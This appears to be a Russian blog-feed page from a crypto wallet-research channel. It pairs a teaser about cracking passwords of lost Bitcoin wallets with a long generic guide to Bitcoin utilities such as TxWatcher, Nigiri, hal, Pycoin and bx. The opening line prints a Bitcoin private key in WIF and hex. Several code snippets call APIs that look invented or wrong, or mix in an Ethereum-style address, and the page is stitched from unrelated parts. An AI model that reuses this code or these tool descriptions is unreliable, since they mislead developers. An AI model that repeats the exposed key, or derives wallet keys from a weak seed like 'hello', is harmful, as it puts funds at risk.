ADDR: 1GjjGLYR7UhtM1n6z7QDpQskBicgmsHW9k WIF: 5KA4spokBSZ7d5QpcuJ3eTDhNJUhfJoQAUovffQWBym3LP3CKTz HEX: B09C765FA3DC6AD138A8D0DA17CD94306FBC32ACB3D67BC093936861CCC48769

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

R

Исходный код

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://www.youtube.com/@cryptodeeptech

Video tutorial: https://dzen.ru/video/watch/66119078be267c07401d9e4c

Источник: https://cryptodeep.ru/gauss-jacobi-method

Показать полностью 23 1

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

https://dzen.ru/video/watch/65de483b3474ef16c0430f35

Биткоин — первая в мире децентрализованная цифровая валюта, которая произвела революцию в нашем представлении о деньгах. Одним из наиболее интересных аспектов Биткоина является широкий спектр утилит, разработанных для его поддержки. Эти утилиты призваны помочь пользователям безопасно и надежно взаимодействовать с сетью Биткоин и играют решающую роль в экосистеме.

Одной из самых популярных биткоин-утилит является биткоин-кошелек. Кошелек — это программное приложение, которое позволяет пользователям хранить, отправлять и получать биткоины. Доступно множество различных типов кошельков, включая настольные, мобильные и аппаратные кошельки. Каждый тип кошелька имеет свои преимущества и недостатки, поэтому важно выбрать тот, который лучше всего соответствует вашим потребностям.

Еще одна важная утилита Биткоин — это обмен биткоинов. Биржа — это платформа, которая позволяет пользователям покупать и продавать биткоины за другие валюты, такие как доллары США или евро. Доступно множество различных бирж, каждая со своим набором комиссий, функциями безопасности и пользовательскими интерфейсами. Важно выбрать биржу с хорошей репутацией, имеющую хорошую репутацию в области безопасности и надежности.

Третий тип утилиты Биткоин — это программное обеспечение для майнинга. Майнинг — это процесс проверки транзакций в сети Биткоин и добавления их в блокчейн. Майнеры вознаграждаются биткоинами за свою работу, и чем больше у них вычислительной мощности, тем больше биткоинов они могут заработать. Программное обеспечение для майнинга позволяет пользователям участвовать в процессе майнинга и зарабатывать биткоины.

Существует также множество других типов биткоин-утилитов, таких как платежные системы, торговые сервисы и обозреватели блокчейнов. Эти утилиты созданы для того, чтобы предприятиям и частным лицам было проще использовать Биткоин в повседневной жизни, и они играют решающую роль в росте и развитии экосистемы Биткоин.

Утилиты Биткоин являются важной частью экосистемы Биткоин. Они предоставляют пользователям инструменты, необходимые для безопасного и надежного взаимодействия с сетью Биткоин, и помогают стимулировать внедрение Биткоина во всем мире. Независимо от того, являетесь ли вы владельцем бизнеса, инвестором или просто человеком, интересующимся цифровыми валютами, существует утилита Биткоин, которая может помочь вам достичь ваших целей.

Преимущество

Одним из менее известных преимуществ Биткоина является его полезность в качестве инструмента для различных приложений. Базовая технология Биткоина, известная как блокчейн, по сути представляет собой децентрализованный реестр, который можно использовать для хранения и проверки данных. Это делает его ценным инструментом для различных отраслей, от здравоохранения до логистики.

Одним из таких приложений является управление цепочками поставок. Используя технологию блокчейна, компании могут отслеживать движение товаров от производителя к конечному потребителю. Это обеспечивает большую прозрачность и подотчетность, снижает риск мошенничества и гарантирует подлинность продукции.

Еще одно применение — в сфере голосования. Технология блокчейн может быть использована для создания безопасной и прозрачной системы голосования, гарантирующей точность и защиту от несанкционированного доступа результатов. Это может помочь восстановить веру в демократический процесс и предотвратить фальсификацию выборов.

Биткоин также можно использовать в качестве средства оплаты товаров и услуг. Это особенно полезно в странах, где традиционные банковские системы недоступны и ненадежны. Биткоин-транзакции быстрые, дешевые и безопасные, что делает их привлекательной альтернативой традиционным способам оплаты.

Наконец, Биткоин можно использовать в качестве средства сбережения. В отличие от традиционных валют, которые могут быть обесценены из-за инфляции или политической нестабильности, Биткоин децентрализован и невосприимчив к таким факторам. Это делает его привлекательным вариантом для тех, кто хочет сохранить свое богатство в долгосрочной перспективе.

Биткоин — это больше, чем просто криптовалюта. Базовая технология блокчейна имеет широкий спектр применений, которые могут принести пользу различным отраслям. От управления цепочками поставок до систем голосования, утилиты Биткоин могут произвести революцию в том, как мы ведем бизнес и взаимодействуем друг с другом. Поскольку технология продолжает развиваться, мы можем ожидать увидеть еще более инновационные применения Биткоина в ближайшие годы.

Классификация

Одной из ключевых особенностей Биткоина является его способность классифицироваться по различным типам полезностей. В этой статье мы рассмотрим различные классификации утилит Биткоин и их важность.

  1. Платежная система

Самая основная классификация Биткоина — это платежная система. Биткоин позволяет пользователям мгновенно отправлять и получать платежи без необходимости использования посредников, таких как банки или платежные системы. Это делает его быстрым, безопасным и экономичным способом перевода денег через границу.

  1. Средство сбережения

Еще одна важная классификация Биткоина — это средство сбережения. Биткоин имеет ограниченное количество монет в 21 миллион, что делает его дефицитным ресурсом. Этот дефицит в сочетании с его децентрализованным характером делает его популярным активом для инвесторов, желающих хранить свое богатство безопасным и защищенным от инфляции способом.

  1. Цифровое золото

Биткоин часто называют «цифровым золотом» из-за его сходства с драгоценным металлом. Как и золото, Биткоин — дефицитный ресурс с ограниченным запасом. Он также децентрализован и действует независимо от какого-либо центрального органа власти. Это делает его привлекательным активом для инвесторов, желающих диверсифицировать свой портфель и застраховаться от инфляции.

  1. Децентрализованная платформа приложений

Биткоин также служит платформой для создания децентрализованных приложений (DApps). Это приложения, которые работают в децентрализованной сети, а не на центральном сервере. Технология блокчейна Биткоин позволяет создавать безопасные и децентрализованные приложения, устойчивые к цензуре и мошенничеству.

  1. Криптовалюта

Наконец, Биткоин — это криптовалюта, что означает, что это цифровой актив, использующий криптографию для защиты транзакций и контроля создания новых единиц. Криптовалюты, такие как Биткоин, разработаны так, чтобы быть децентрализованными и работать независимо от какого-либо центрального органа. Это делает их привлекательной альтернативой традиционным валютам, которые подвержены инфляции и манипуляциям со стороны центральных банков. Биткоин — это универсальная и инновационная технология, которую можно разделить на различные типы полезностей. Как платежная система, средство сбережения, цифровое золото, децентрализованная платформа приложений и криптовалюта, Биткоин может революционизировать наше представление о деньгах и финансовых транзакциях.

Биткоин-утилиты

Мониторинг транзакций по биткоин-адресам с помощью Python и TxWatcher 1

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)
Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

GitHub: https://github.com/tsileo/txwatcher

TxWatcher — это инструмент на основе Python, который позволяет отслеживать транзакции по биткоин-адресам. Его можно использовать для различных целей, например для отслеживания пожертвований некоммерческой организации или мониторинга платежей, поступающих на торговый счет. В этой статье мы покажем вам, как использовать TxWatcher для мониторинга транзакций на биткоин-адресах.

Сначала вам нужно установить TxWatcher. Вы можете сделать это, выполнив следующую команду в своем терминале:

pip install txwatcher

После установки TxWatcher вы можете начать мониторинг транзакций, создав новый экземпляр класса  TxWatcher . Вот пример:

from txwatcher import TxWatcher # Create a new TxWatcher instance tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet') # Monitor transactions for a specific Bitcoin address address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC' tx_watcher.watch_address(address)

В этом примере мы создаем новый  TxWatcher экземпляр и передаем наш ключ API и сеть Биткоин, которую мы хотим отслеживать (в данном случае тестовую сеть). Затем мы вызываем  watch_address() метод и передаем биткоин-адрес, который хотим отслеживать.

TxWatcher теперь начнет отслеживать транзакции для указанного биткоин-адреса. Вы можете прослушивать новые транзакции, вызвав  listen_for_transactions() метод:

# Listen for new transactions tx_watcher.listen_for_transactions()

Это заблокирует выполнение вашей программы до тех пор, пока не будет обнаружена новая транзакция. При обнаружении новой транзакции TxWatcher выдаст  transaction событие. Вы можете прослушивать это событие и что-то делать с данными транзакции, например сохранять их в базе данных или отправлять уведомление по электронной почте.

Вот пример того, как прослушивать новые транзакции и сохранять данные транзакций в базе данных MongoDB:

from txwatcher import TxWatcher from pymongo import MongoClient # Create a new TxWatcher instance tx_watcher = TxWatcher(api_key='YOUR_API_KEY', network='testnet') # Connect to MongoDB client = MongoClient('mongodb://localhost:27017/') db = client['my_database'] collection = db['transactions'] # Monitor transactions for a specific Bitcoin address address = '1LdRcdxfbSnmCYYNdeYpUnztiYzVfBEQeC' tx_watcher.watch_address(address) # Listen for new transactions and store them in MongoDB tx_watcher.listen_for_transactions(on_transaction=lambda transaction: collection.insert_one(transaction.to_dict()))

В этом примере мы подключаемся к локальному экземпляру MongoDB и создаем новую базу данных и коллекцию для хранения данных транзакций. Затем мы вызываем  listen_for_transactions() метод и передаем лямбда-функцию, которая принимает объект транзакции и вставляет его в коллекцию MongoDB с помощью этого  insert_one() метода.

Вот и все! Теперь вы знаете, как использовать TxWatcher для мониторинга транзакций на биткоин-адресах. Проявив немного творчества, вы можете использовать этот инструмент для создания всевозможных приложений и сервисов, связанных с биткоинами.

Скрипт Python, использующий txwatcher:

import txwatcher # create a new instance of the txwatcher txwatcher = txwatcher.TxWatcher() # connect to the blockchain txwatcher.connect_blockchain() # monitor a specific address for incoming transactions txwatcher.monitor_address('0x1234567890abcdef1234567890abcdef1234567890abcdef1234') # monitor a specific transaction hash for confirmations txwatcher.monitor_transaction_hash('0x1234567890abcdef1234567890abcdef1234567890abcdef1234') # print the transaction details when a new transaction is detected txwatcher.print_transaction_details() # close the connection to the blockchain txwatcher.close_blockchain_connection()

Этот скрипт импортирует модуль txwatcher и создает новый экземпляр класса TxWatcher. Затем он подключается к блокчейну и отслеживает определенный адрес и хэш транзакции на предмет входящих транзакций и подтверждений соответственно. Наконец, он печатает детали транзакции и закрывает соединение с блокчейном.

Нигири Вкусный док-бокс для приготовления особых биткоинов, молний и жидких блюд 2

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

GitHub: https://github.com/vulpemventures/nigiri

Nigiri — это инструмент с интерфейсом командной строки (CLI), который упрощает процесс настройки среды тестирования биткоинов. С помощью Nigiri пользователи могут быстро и легко запустить блок регистрации биткоинов, а также Electrs и Esplora, два популярных инструмента для разработчиков биткоинов. Nigiri также включает команды faucet и push, которые упрощают тестирование приложений и сервисов Bitcoin.

Regtest — это среда тестирования биткоинов, которая имитирует сеть биткоинов без использования реальных биткоинов. Это позволяет разработчикам тестировать свои биткоин-приложения и сервисы, не рискуя реальными деньгами. Electrs — это программное обеспечение для полного узла Биткоин, которое индексирует блокчейн Биткоина и предоставляет API для его запроса. Esplora — это веб-обозреватель блоков, который позволяет пользователям просматривать и анализировать блокчейн Биткоина.

Нигири упрощает процесс настройки среды тестирования Биткоин, предоставляя единую команду, которая настраивает все необходимые компоненты. Сюда входит программное обеспечение Bitcoin Core, Electrs, Esplora и сборщик биткоинов, который предоставляет бесплатные тестовые биткоины для целей тестирования.

Команда faucet в Нигири позволяет легко получить тестовые биткоины для целей тестирования. Команда push позволяет пользователям отправлять тестовые биткоины на другие адреса в сети regtest. Эти команды упрощают процесс тестирования приложений и сервисов Биткоин, упрощая разработчикам тестирование своих приложений, не рискуя реальными деньгами.

В целом, Nigiri — это мощный инструмент для разработчиков биткоинов, которые хотят быстро и легко настроить среду регистрации биткоинов. С помощью Nigiri разработчики могут тестировать свои приложения и услуги, не рискуя реальными деньгами, а также легко получать тестовые биткоины для целей тестирования. Команды faucet и push упрощают симуляцию реальных биткоин-транзакций, позволяя разработчикам тестировать свои приложения в реалистичной среде.

Nigiri — это инструмент с интерфейсом командной строки (CLI), который позволяет быстро настроить блок регистрации биткоинов с помощью Electrs и Esplora. Regtest — это частный блокчейн, который вы можете использовать для тестирования и экспериментов, не беспокоясь о реальных транзакциях биткоинов. Electrs — это легкий и высокопроизводительный сервер Electrum, обеспечивающий быстрый доступ к данным блокчейна, а Esplora — обозреватель блокчейна, позволяющий просматривать транзакции и блоки в сети regtest.

Nigiri также включает в себя команду сборщика, которая позволяет генерировать тестовые адреса биткоинов с предварительно добытыми средствами, и команду push, которая позволяет отправлять транзакции в сеть regtest. С помощью Nigiri вы можете быстро и легко настроить среду регистрации биткоинов для тестирования и экспериментов, не беспокоясь о сложностях настройки полного узла биткоинов.

Подводя итог, можно сказать, что Нигири — это мощный инструмент для всех, кто хочет экспериментировать с биткоинами и технологией блокчейна в частной и безопасной среде. Благодаря простому интерфейсу командной строки и встроенной интеграции Electrs и Esplora, Nigiri позволяет легко настроить блок регистрации биткоинов и начать исследовать мир биткоинов и технологий блокчейна.

Скрипт, который вы можете использовать для запуска нигири в докер-контейнере:

#!/usr/bin/env python3 import docker import os # set the docker client and image name client = docker.from_env() image_name = 'nigiri' # create a docker container container = client.containers.run( image=image_name, ports={'80': '80'}, volumes={'/var/run/docker.sock': '/var/run/docker.sock'}, detach=true ) # wait for the container to start print("waiting for the container to start...") container.wait() # get the ip address of the container ip_address = container.attrs['networksettings']['networks']['bridge']['ipaddress'] # print the url of the nigiri dashboard print(f"nigiri dashboard is available at: http://{ip_address}:80") # stop and remove the container print("stopping and removing the container...") container.stop() container.remove()

Этот скрипт создает контейнер докеров с образом нигири, сопоставляет порт 80 с хостом и монтирует том сокета докеров, чтобы нигири мог получить доступ к API докеров. Затем он ждет запуска контейнера, получает его IP-адрес, печатает URL-адрес информационной панели нигири, а затем останавливает и удаляет контейнер.

Чтобы использовать этот скрипт, в вашей системе должны быть установлены Python 3.x и Docker. вы можете запустить его, сохранив в файл (например  run_nigiri.py) и запустив его с помощью  python run_nigiri.py.

«hal» — биткоин-клиент швейцарского армейского ножа (на основе ржавчины-биткоина) 3

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

GitHub: https://github.com/stevenroose/hal

hal — это мощный инструмент интерфейса командной строки для Биткоин, построенный на основе ржавчины-биткоина. Он задуман как своего рода швейцарский армейский нож, предоставляющий широкий спектр функций для пользователей и разработчиков биткоинов.

Некоторые из ключевых особенностей hal включают в себя:

  1. Генерация адресов: hal может генерировать новые биткоин-адреса для вашего использования.

  2. Создание транзакции: вы можете использовать hal для создания новых транзакций Биткоин, указав входы, выходы и любые другие необходимые параметры.

  3. Подписание транзакции: как только вы создали транзакцию, вы можете использовать hal, чтобы подписать ее, используя свои личные ключи.

  4. Трансляция транзакций: как только ваша транзакция будет подписана, вы можете использовать hal для ее трансляции в сеть Биткоин.

  5. Анализ блоков и транзакций: hal может анализировать блоки и транзакции Биткоина, позволяя извлекать из них данные.

  6. Управление кошельком: вы можете использовать hal для управления своими биткоин-кошельками, включая создание новых кошельков, импорт и экспорт ключей, а также управление вашими балансами.

  7. Сценарии: hal включает в себя мощный язык сценариев, который позволяет автоматизировать сложные задачи, связанные с биткоинами.

В целом, hal — очень полезный инструмент для всех, кто регулярно работает с Биткоином. Являетесь ли вы разработчиком, создающим биткоин-приложения, трейдером, управляющим вашими биткоин-активами, или просто человеком, который хочет изучить возможности протокола Биткоин, hal может помочь вам выполнить эту работу.

Скрипт:

import subprocess def execute_hal(): subprocess.run(["hal", "--help"]) execute_hal()

этот скрипт использует модуль подпроцесса в Python для выполнения команды «hal –help» в терминале. вы можете изменить этот сценарий для выполнения любой другой команды, которую захотите.

hal — это инструмент командной строки, который предоставляет все виды утилит, связанных с биткоинами.

Монтаж:

$ cargo install --locked hal

Краткое описание команд:

  • адрес

    • проверить: получить информацию об адресах

    • create: создавать адреса, используя открытые ключи или скрипты.

  • bech32

    • декодировать: анализировать элементы формата Bech32

    • кодировать: кодировать данные в формате Bech32.

  • бип32

    • получение: получение ключей и адресов из расширенных ключей

    • проверить: проверить BIP-32 xpub или xpriv

  • бип39

    • генерировать: создать новую мнемонику BIP-39.

    • get-seed: получить начальное значение и главный ключ BIP-32 для заданной мнемоники BIP-39.

  • блокировать

    • create: создать двоичный блок из JSON

    • декодировать: декодировать двоичный блок в JSON

  • хэш

    • sha256: хеш-данные с помощью SHA-256.

    • sha256d: хеш-данные с двойным SHA-256.

  • ключ

    • генерировать: генерировать случайную пару ключей

    • получить: сгенерировать открытый ключ из закрытого ключа

    • проверить: проверить закрытые ключи

    • ecdsa-sign: создавать подписи ECDSA

    • ecdsa-verify: проверить подписи ECDSA

    • pubkey-tweak-add: добавить скаляр к точке

    • pubkey-combine: сложить две точки вместе

  • Ин

    • счет

      • декодировать: декодировать счета Lightning

  • Меркл

    • доказательство-создать: создать доказательство Меркла

    • доказательство-проверить: проверить доказательство Меркла

  • сообщение

    • hash: получить хэши сообщения, подписанного биткоинами.

    • знак: подпишите сообщение, используя сообщение, подписанное биткоинами

    • проверить: проверить сообщение, подписанное биткоинами

    • восстановить: восстановить открытый ключ или адрес, которым подписано сообщение.

  • минискрипт

    • дескриптор: получить информацию о выходном дескрипторе

    • instspect: проверить минискрипты

    • синтаксический анализ: преобразовать скрипт в минискрипт

    • политика: проверить политики

  • ПСБТ

    • create: создать PSBT из необработанной неподписанной транзакции.

    • декодировать: декодировать PSBT в JSON

    • редактировать: редактировать встроенный PSBT

    • Finalize: завершить PSBT в полностью подписанную транзакцию

    • объединить: объединить несколько PSBT в один

  • случайный

    • байты: генерировать случайные байты

  • сценарий

    • декодировать: декодировать PSBT в JSON

  • Техас

    • create: создать бинарную транзакцию из JSON

    • декодировать: декодировать двоичную транзакцию в JSON

Минимальная поддерживаемая версия Rust (MSRV) :

hal всегда должен компилироваться на  Rust 1.41.1 . Обратите внимание, что он должен быть построен с использованием  Cargo.lock файла, поэтому используйте --locked

«BitKey» — Live USB для транзакций с воздушным зазором и биткоинский швейцарский армейский нож 4

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

Гитхаб: https://github.com/bitkey/bitkey

BitKey — это операционная система Live USB, предназначенная для изолированных транзакций и являющаяся «швейцарским армейским ножом» для биткоинов. Это дистрибутив Linux, основанный на Debian, который поставляется с различными предустановленными инструментами, связанными с биткоинами.

Одной из основных особенностей BitKey является его способность создавать изолированные транзакции. Это означает, что вы можете создать транзакцию Биткоин на компьютере, который не подключен к Интернету, а затем транслировать ее в сеть Биткоин с другого компьютера, подключенного к Интернету. Это очень безопасный способ создания биткоин-транзакций, поскольку он исключает риск кражи ваших личных ключей хакерами.

BitKey также поставляется с множеством других инструментов, связанных с биткоинами, включая Bitcoin Core, Electrum, Armory и Bitcoin-QT. Эти инструменты позволяют вам управлять своими биткоин-кошельками, отправлять и получать биткоин-транзакции, а также контролировать сеть биткоинов.

В дополнение к инструментам, связанным с Биткоином, BitKey также включает в себя множество других полезных утилит, таких как GParted, редактор разделов, и KeePassX, менеджер паролей. Эти инструменты могут быть полезны для управления вашим компьютером и обеспечения безопасности ваших паролей.

BitKey прост в использовании, даже если вы не знакомы с Linux. Просто загрузите ISO-образ с веб-сайта BitKey, запишите его на USB-накопитель с помощью такого инструмента, как Rufus или UNetbootin, а затем загрузите компьютер с USB-накопителя. После загрузки BitKey вы можете сразу же начать использовать его инструменты.

В целом, BitKey — это мощный и полезный инструмент для всех, кто хочет создавать изолированные биткоин-транзакции или безопасно управлять своими биткоин-кошельками. Его коллекция инструментов и утилит, связанных с биткоинами, делает его настоящим швейцарским армейским ножом для биткоинов, а простота использования делает его доступным даже для начинающих пользователей.

вот скрипт, который загрузит и запишет BitKey на USB-накопитель:

#!/bin/bash # This script will download and write BitKey to a USB drive # Make sure you have a USB drive plugged in before running this script # Download the latest BitKey ISO image wget -O bitkey.iso https://bitkey.io/bitkey.iso # Write the ISO image to the USB drive dd if=bitkey.iso of=/dev/sdX bs=4M

Вам нужно будет заменить  /dev/sdX фактическое имя устройства вашего USB-накопителя. Вы можете найти это, запустив  lsblk и найдя устройство, соответствующее вашему USB-накопителю.

Обратите внимание, что этот сценарий предполагает, что вы используете операционную систему на базе Linux. Если вы используете Windows, вам необходимо соответствующим образом изменить сценарий.

«Pycoin» — служебная библиотека биткоинов и альтернативных монет на основе Python 5.

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

GitHub: https://github.com/richardkiss/pycoin

Pycoin — это служебная библиотека биткоинов и альтернативных монет на основе Python. Это проект с открытым исходным кодом, а это значит, что каждый может использовать его бесплатно. Pycoin предоставляет набор инструментов для работы с биткоинами и альт-монетами.

Pycoin поддерживает множество различных альтернативных монет, включая Litecoin, Dogecoin и Namecoin. Он также поддерживает тестовые сети, такие как тестовая сеть Биткоин (Testnet) и тестовая сеть Litecoin (Testnet3).

Pycoin имеет ряд функций, которые делают его полезным для разработчиков, работающих с биткоинами и альт-монетами. Одной из наиболее важных особенностей является поддержка различных криптографических алгоритмов, включая алгоритм цифровой подписи на основе эллиптической кривой (ECDSA) и алгоритм безопасного хэширования (SHA-256).

Pycoin также обеспечивает поддержку различных типов транзакций, включая простые транзакции, транзакции с несколькими подписями и транзакции с блокировкой по времени. Он также поддерживает создание новых адресов и генерацию новых закрытых ключей.

Pycoin спроектирован таким образом, чтобы его было легко использовать даже для разработчиков, которые плохо знакомы с биткоинами и альт-монетами. Он предоставляет простой API для работы с различными аспектами протоколов Биткоин и альтернативных монет, включая транзакции, адреса и блоки.

В дополнение к своим основным функциям Pycoin также предоставляет ряд полезных утилит, таких как интерпретатор сценариев и обозреватель блоков. Эти утилиты упрощают работу с биткоинами и альт-монетами и могут использоваться для создания широкого спектра приложений.

В целом, Pycoin — это мощная и гибкая библиотека для работы с биткоинами и альт-монетами. Независимо от того, создаете ли вы простой биткоин-кошелек или сложную систему обмена альтернативными монетами, Pycoin поможет вам выполнить работу быстро и легко.

Вот простой пример того, как использовать библиотеку pycoin для создания биткоин-адреса:

from pycoin.key import Key from pycoin.networks.bitcoin import networks from pycoin.encoding import double_sha256 # Create a private key key = Key.from_seed("hello") # Get the public key from the private key public_key = key.get_public_key() # Get the Bitcoin address from the public key address = public_key.address(network=networks.livenet) # Print the address print(address)

Это выведет биткоин-адрес, соответствующий закрытому ключу «привет». Вы можете изменить начальное число «hello», чтобы сгенерировать другой адрес.

«bx» — инструмент командной строки Bitcoin 6

Изучение недооцененной силы Биткоин утилит: подробное руководство в Google Colab Биткоины, Криптовалюта, Валюта, Доллары, Длиннопост, Яндекс Дзен (ссылка)

GitHub: https://github.com/libbitcoin/libbitcoin-explorer

Инструмент командной строки bx — мощный и универсальный инструмент для взаимодействия с сетью Биткоин. Он предоставляет ряд функций, включая управление кошельком, создание транзакций и анализ блокчейна.

Одной из ключевых особенностей инструмента bx является его способность создавать кошельки и управлять ими. С помощью bx вы можете легко создать новый кошелек или импортировать существующий. После настройки кошелька вы можете использовать bx для генерации адресов, отправки и получения средств, а также проверки своего баланса.

Еще одной важной особенностью инструмента bx является его способность создавать и транслировать транзакции в сети Биткоин. С помощью bx вы можете создавать собственные транзакции с нуля или использовать готовые шаблоны для быстрого создания транзакций для распространенных случаев использования. Вы также можете использовать bx для подписи и проверки транзакций, а также для их трансляции в сеть.

Помимо управления кошельком и транзакциями, инструмент bx также предоставляет ряд функций для анализа блокчейна. С помощью bx вы можете запросить у блокчейна информацию о транзакциях, блоках и адресах. Вы также можете использовать bx для создания отчетов и визуализации данных блокчейна, что делает его мощным инструментом для исследователей и разработчиков.

В целом, инструмент командной строки bx является ценным дополнением к набору инструментов любого биткоин-разработчика. Его универсальность и простота использования делают его важным инструментом для всех, кто хочет создавать приложения или сервисы в сети Биткоин.

import subprocess # execute the command subprocess.run(['bx', 'command_name', 'parameter1', 'parameter2', ..])

вы можете заменить «имя_команды» и «параметр1», «параметр2» и т. д. фактической командой и ее параметрами, которые вы хотите выполнить.

import subprocess # execute the bx command subprocess.run(["bx", "tx", "info", "tx_id"])

этот код импортирует  subprocess модуль, а затем запускает  bx команду с  аргументами tx info и  tx_id . вы можете заменить  tx_id идентификатор транзакции, которую хотите найти.

пример сценария Python, который использует  subprocess модуль для выполнения  bx инструмента командной строки:

import subprocess # replace this with the path to your bx executable bx_path = "/path/to/bx" # command to execute command = [bx_path, "help"] # execute the command and capture the output output = subprocess.check_output(command) # print the output print(output.decode())

Вы можете заменить  command список любой другой командой, которую хотите выполнить с помощью этого  bx инструмента. Просто не забудьте указать путь к  bx исполняемому файлу в  bx_path переменной.

Также обратите внимание, что этот скрипт будет работать только в Unix-подобных системах (например, Linux или macOS). Если вы используете Windows, вам необходимо соответствующим образом изменить сценарий.

Показать полностью 7
Отличная работа, все прочитано!